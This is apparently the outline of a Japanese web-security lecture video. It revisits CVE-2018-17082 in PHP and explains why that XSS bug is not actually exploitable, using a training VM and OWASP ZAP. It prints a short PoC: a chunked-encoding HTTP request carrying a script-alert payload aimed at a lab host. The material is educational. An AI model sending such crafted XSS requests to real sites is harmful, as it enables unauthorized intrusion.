- 本日お伝えしたいこと
- CVE-2018-17082のおさらい -「XSS」CVE-2018-17082 がXSS攻撃できない理由
- 前提となる環境
- 徳丸本VM
- OWASP ZAP (Burp Suite等でも可)
PoC(攻撃文字列)は下記(Transfer-Encoding: chunked以下の部分)
GET /31/31-001.php HTTP/1.1
Host: example.jp:88
...
Transfer-Encoding: chunked
Content-Length: 34
<script>alert('Hacked')</script>
動画URL : https://youtu.be/I7Sh2YnIO4Y
YouTubeチャンネル 徳丸浩のウェブセキュリティ講座